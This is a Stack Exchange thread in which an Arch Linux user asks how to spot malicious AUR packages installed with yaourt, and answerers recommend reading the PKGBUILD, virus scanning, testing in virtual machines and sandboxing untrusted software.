11

How do I recognize if a package which is installed via yaourt on arch linux could be harmful to my pc? I read in the wiki that I should check every installation I make with yourt. But what exactly do I have to check and how do I recognize malicious packages?

Gilles 'SO- stop being evil'
  • 807,993
  • 194
  • 1,674
  • 2,175
lup3x
  • 257
  • 5
  • 8
  • You should use official packages without AUR. There isn't guarantee because anybody can upload anything to AUR, only a registration needed. Check the comments and votes of AUR-packages maybe it's a good starting point. – uzsolt Nov 11 '13 at 13:37
  • The wiki instruction is to read the PKGBUILD before proceeding with the install... – jasonwryan Nov 11 '13 at 16:37
  • 3
    @uzsolt That is faintly ridiculous: there are a lot of great packages in the AUR, some of which have been moved from the official repos. Using AUR packages, in principle, is fine; what is important is *understanding* what you are installing. – jasonwryan Nov 11 '13 at 16:39
  • 1
    It is doubtless but how can anybody know that `aur-foo` package is harmful or not. Is there exist a general rule or algorithm? I think, doesn't. And the read of PKGBUILD isn't enough - think will install a harmful C-program. Do you read the full source code before install? I think should check the comments (about reports, warnings) and the votes (if there's many-many votes it seems not so bad). I'm using many AUR packages and I think most of these are good. But... the devil never sleeps :) – uzsolt Nov 11 '13 at 18:37

2 Answers2

7

You can't, not really, without doing an extensive audit of the code and observing it in action "from the outside", for example using a virtual machine. There is no bulletproof way to find malicious packages, and certainly no automated way which couldn't be circumvented relatively easily. Some things you can realistically do, none of which are silver bullets:

  • Download the package, unpack it (don't install it!) and run a virus check on the unpacked files. This can find some well-known problems, but not targeted or custom hacks.
  • Before using it, install it on a virtual machine and check that it doesn't do anything "suspicious", such as touching files it shouldn't, communicating with outside servers, starting daemon processes on its own, etc.. Of course, it could be doing things like that on a timed basis, for example after running for X hours, and there's no way you'd know without detailed inspection of the code. Rootkit detectors can automate some of this.
  • Install in a restricted environment. SELinux, chroot jails, virtual machines, separate disconnected machines, and many other things can contain different types of problematic software, from the plain bad to the actively malicious.
  • Valuable (but not secret) data can be placed on separate servers with read-only access given to the untrusted machine.
  • Secret data should be placed on a machine which is unreachable from the untrusted machine. Any communication should be manual copies via removable media.

Finally, the only secure software is no software. Are you sure you need to install software you don't trust? Is there no well-known, trusted alternative?

l0b0
  • 50,672
  • 41
  • 197
  • 360
  • Well I just followed the wiki entries for xflux and the sun JDK. Is your guide for every entry of the AUR or can I trust the packages which have an extensive wiki.archlinux article? – lup3x Nov 11 '13 at 15:38
  • 4
    Nobody can tell you who to trust. Nobody knows who to trust. All you can do is make a judgement call based on your own experience, the advice of people you trust, the popularity of the package, or any other heuristic you judge to be sufficient. – l0b0 Nov 11 '13 at 15:45
  • Thanks I will keep that in mind when installing new packages – lup3x Nov 11 '13 at 19:17
  • 2
    I'm unsure whether to trust @l0b0's advice. – Sparhawk Feb 03 '15 at 02:57
  • 1
    @Sparhawk Good, we're on the Internet after all, and who to trust *has* to be a personal decision. – l0b0 Feb 03 '15 at 08:25
4

As mentioned before, you can't know for sure.

One of the main heuristics I personally use are:

If I was going to try and install this manually I'd be downloading it from spotify.com anyway, so this is okay in my books. A brief skim read of the rest of the PKGBUILD and it doesn't seem to be doing anything obviously unusual. Of course there are ways to be sneaky but I think the main target for any malicious code on AUR would be people using yaourt etc who don't usually read the PKGBUILD before they install software and wouldn't spot the problem even if it was obvious.

Archemar
  • 31,183
  • 18
  • 69
  • 104
kellpossible
  • 141
  • 3